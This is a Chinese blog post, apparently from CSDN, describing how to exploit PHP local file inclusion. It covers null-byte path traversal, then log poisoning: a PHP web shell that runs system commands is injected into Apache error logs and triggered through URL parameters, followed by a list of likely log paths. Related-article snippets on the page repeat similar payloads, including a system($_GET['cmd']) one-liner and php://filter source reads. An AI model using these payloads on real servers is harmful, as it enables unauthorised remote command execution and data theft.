PHP本地文件包含(LFI)漏洞利用

最新推荐文章于 2024-03-22 08:22:18 发布
最新推荐文章于 2024-03-22 08:22:18 发布
阅读量657 收藏
点赞数
分类专栏: Hacking 文章标签: php apache linux tools 浏览器 360
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6869336
版权

如果是在win上,提交:test.php?for=D:\tools\readme.txt%00,就可以了,跨目录跨盘符。这里要注意,对于过多的”..\”,360会自动拦截,比较好的办法是使用ie或者ff。

但是光是浏览文件是不够的,我们还需要webshell。可以使用log injection的方法。这也是我作这个记录的主要目的,这才是重点所在。

这里,思想的核心是要将php代码注入到log中,比如,我们可以将:

<?php $s=$_GET;@chdir($s['x']);echo @system($s['y'])?>

注入进去(浏览器的自动更改实在太烦人)。注:friddle2不会对针对本机的访问过滤,我就输入本机的地址:192.168.0.1。

然后访问:test.php?for=/var/log/apache/logs/error_log%00&x=/&y=uname,这是针对linux。如果平台切换到win,可以访问:test.php?for=..\apache\logs\error.log%00&x=.y=dir,会显示当前目录文件。

当然,我们也可以将日志记录到access.log里,但那样会更复杂一些,因为需要包含的文件会更大。

参考文献还提到了:使用linux的/proc/self/fd进行注入的方法,我对linux不熟悉,所以也没有细看,以后需要的时候再了解吧。

额外的发现:

360浏览器有个奇怪的特性,当访问 http://www.baidu.com/search/error.html%00../../../../../../tools后,会访问一下目录:D:\Program files\360se\tools 看看有没有这个文件夹,这里有问题吧?TDH

D:\Program files\360se\360se3\http:\apache\logs\error.log%00&y=dir和http://192.168.0.1:88/test.php?for=..\..\..\apache\logs\error.log%00&y=dir,这两者之间的关系是怎么得来的?

附录:

1、可能的log路径、

/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/www/logs/thttpd_log
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/thttpd_log
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
C:\apache\logs\access.log
C:\apache\logs\error.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\program files\wamp\apache2\logs
C:\wamp\apache2\logs
C:\wamp\logs
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log


PHP安全之LFI漏洞GetShell方法大阅兵


http://www.myhack58.com/Article/html/3/62/2011/32008.htm

7禧
关注
专栏目录
LFI 漏洞的利用
Soul Blog
11-29 3225
LFI 漏洞的利用 参考链接1 参考链接2 LFI(本地文件包含漏洞),这篇文章将介绍有关该漏洞的一些利用 1、phpinfo 漏洞信息利用 将LFI漏洞转变为远程代码执行(RCE)漏洞的竞争条件,服务器端需要满足以下条件: LFI漏洞 任何显示PHPInfo()配置输出的脚本 脚本下载地址 得到脚本后,我们需要修改脚本中的攻击载荷, 使用命令 locate php-reverse 定位可用的php载荷位置 /usr/share/laudanum/php/php-reverse-s
php本地文件包含漏洞,本地文件包含漏洞详解---LFI
weixin_30668061的博客
03-09 1098
1概述文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句就可以调用内部定义的函数。本地包含漏洞PHP中一种典型的高危漏洞。由于程序员未对用户可控的变量进行输入检查,导致用户可以控制被包含的文件,成功利用时可以使web server...
LFI漏洞利用总结
Taowood的博客
07-25 9158
主要涉及到的函数 include(),require()、include_once(),require_once() magic_quotes_gpc()、allow_url_fopen()、allow_url_include()、move_uploaded_file() 、readfile() file()、and file_get_contents()、upload_tmp_dir()、pos...
LFI漏洞利用总结(文件包含)
qq_60115503的博客
04-19 6243
原因 LFI产生的原因是由于程序员未对用户可控变量进行输入检查,此漏洞的影响可能导致泄露服务器上的敏感文件,如若攻击者能够通过其他方式在Web服务器上放置代码,那么他们便可以执行任意命令 涉及到的函数 主要涉及到的函数 include() require() include_once() require_once() magic_quotes_gpc() allow_url_fopen() allow_url_include() move_uploaded_file()
toxin:LFI(本地文件包含漏洞利用工具
05-30
毒素 Toxin 是一个 LFI(本地文件包含)/日志污染利用工具。 介绍 Toxin 利用特定(但也是常见)类型的本地文件包含 (LFI) 漏洞,攻击者可以利用该漏洞利用 PHP 的register_globals设置。 在这种攻击场景中,攻击者会制作一个自定义的User-Agent标头,其中包含任意 PHP 代码,这些代码将向环境注册一个新的全局变量,如下所示: <?php system ( $ _GET [ 'cmd' ]); ?> 注册新的恶意全局变量后,我们可以将其添加到 URL 中的查询字符串中,该 URL 包含目标主机上容易被包含的文件,然后使用该文件和查询字符串执行任意系统级命令,像这样: http://target.tld/info.php?page=../../../../../var/log/apache/access.log&cmd=whoami 有许多
LFI本地包含漏洞利用小技巧
收集盒 Book box
09-12 643
0×00 题外话 嘿嘿 希望大家多多探讨技术。 0×01 PHP Input/Ouput Wrapper 远程包含函数执行命令 详细: PHP 的include()函数存在设计缺陷,远程攻击者可以利用这个漏洞可能以WEB 权限执行任意命令。 PHP 的一个设计错误,当URI 数据作为’include()’函数的一个参数时,攻击者可以提交POST PHP 命令来执行。此问题影响P
php 伪造本地文件包含漏洞的代码
10-28
### PHP 伪造本地文件包含漏洞详解 #### 一、引言 在Web开发领域,PHP是一种广泛使用的服务器端脚本语言。然而,由于其灵活性,PHP应用程序也面临着各种安全威胁,其中“本地文件包含”(Local File Inclusion,...
lfipwn:LFI扫描,漏洞利用工具
07-12
LFIPWN是一款基于Python编写的工具,专注于Local File Inclusion(LFI,本地文件包含漏洞的扫描和利用。在网络安全领域,LFI漏洞允许攻击者通过Web应用程序读取服务器上的任意文件,包括敏感的系统配置、数据库...
PHP LFI(本地文件包含漏洞
渗透测试
09-13 897
PHP LFI(本地文件包含漏洞) 与其相关的函数: include // 只在执行到此函数时才去包含文件,若包含的文件不存在产生警告,程序继续运行 include_once // 如果一个文件已经被包含过,则不会在包含它 require // 程序一运行文件便会包含进来,若包含文件不存在产生致命错误,程序终止运行 require_once // 如果一个文件已经被包含过,则不会在包含它 本题提示代码 $filename = 'pages/'.(isset($_GET["fi
PHP LFI
iteye_16188的博客
11-09 191
1. LFI http://www.example.com/index.php?m[color=red][b]=php://filter/convert.base64-encode/resource=[/b][/color]index http://www.example.com/index.php?m[color=red][b]=php://filter/read=convert.base6...
php 伪协议 lfi,php://伪协议(I/O)总能给你惊喜——Bugku CTF-welcome to bugkuctf
weixin_42519985的博客
03-19 295
今天一大早BugkuCTF 的welcome to bugkuctf 就给了我一发暴击:完全不会啊。。。光看源码就发现不知道怎么处理了,于是转向writeup求助。结果发现这是一道非常有营养的题目,赶紧记录一下。题目链接:http://123.206.87.240:8006/test1/源码要点很清晰,首先是三个变量用get方式传进去。(这里password变量不是重点)之后,要用file_get...
php本地文件包含解决方法,PHP本地文件包含(LFI)漏洞利用
weixin_39979516的博客
03-17 163
0x00 案例参考资料:http://downloads.ackack.net/LocalFileInclusion.pdf实验代码:include($_GET['for'].‘.php’);//用于测试本地包含漏洞?>Linuxtest.php?for=/etc/passwd%00Wintest.php?for=D:\readme.txt%00Log Injection訪問任意頁面,問號後...
如何使用PHP进行文件包含和引用?
最新发布
长风破浪会有时的博客
03-22 360
使用include或require可以包含其他PHP文件里的代码。include在包含失败时发出警告,而require在包含失败时停止脚本执行。使用或可以避免重复包含同一个文件。
项目实践|基于Flink的用户行为日志分析系统
大数据星球-浪尖
09-01 1453
用户行为日志分析是实时数据处理很常见的一个应用场景,比如常见的PV、UV统计。本文将基于Flink从0到1构建一个用户行为日志分析系统,包括架构设计与代码实现。本文分享将完整呈现日志分析...
【CTF】LFI漏洞总结(PHP本地文件包含漏洞
热门推荐
HAPPY
07-31 1万+
学习链接: https://www.cnblogs.com/wh4am1/p/6542398.html   发现地址后面的参数直接使用的文件包含。  ?file=show.php 为了查看index.php的源文件, 可以使用下面的命令: rlfi.php  ?language=php://filter/read=convert.base64-encode/resource=index.p...
文件包含漏洞之——本地文件包含漏洞 (LFI)
wsnbbz的博客
03-04 2572
定义 能够读取或执行包含本地文件的漏洞,称为本地文件包含漏洞 源代码 原理 为了方便,include等函数里放的不是一个指定文件,而是一个接收文件的变量,从而造成用户可以控制参数file改变这个变量 当参数file 的值为一个指定路径的文件时,此时变量就是此路径,include函数就会执行此文件,当文件不是可执行的php文件时,就会将文件内容读取出货来,这样用户就可通过更改url里的参数进行读取...
php LFI的研究
weixin_33713707的博客
01-10 118
2019独角兽企业重金招聘Python工程师标准>>> ...
php本地包含
kali_linux的专栏
01-02 1016
php渗透测试 php文件包含 演示
LFI(本地文件包含)获取Webshell
weixin_30734435的博客
10-11 452
本地文件包含在Web渗透测试中时不时的会遇到。之前遇到本地文件包含的时候,最多就是证明一下:比如包含“/etc/passwd”。有利用本地文件包含来进行Getshell的,之前是略有耳闻的,这两天看相关文章的时候,好奇一下自己搭环境实现了一遍。很老的技术了,看老外在2011年就写了相关文章,不过文章中的Python程序是有问题的。我会在最后把自己修改的代码分享出来。 ...
提升渗透测试技能:揭秘本地文件包含(LFI)漏洞检测与利用
本地文件包含(Local File Inclusion, LFI)是渗透测试领域中的一个重要知识点,特别是在Web应用程序的安全评估中。这种漏洞发生在Web应用未对用户输入进行有效过滤,使得攻击者能够通过恶意URL或脚本参数,使服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值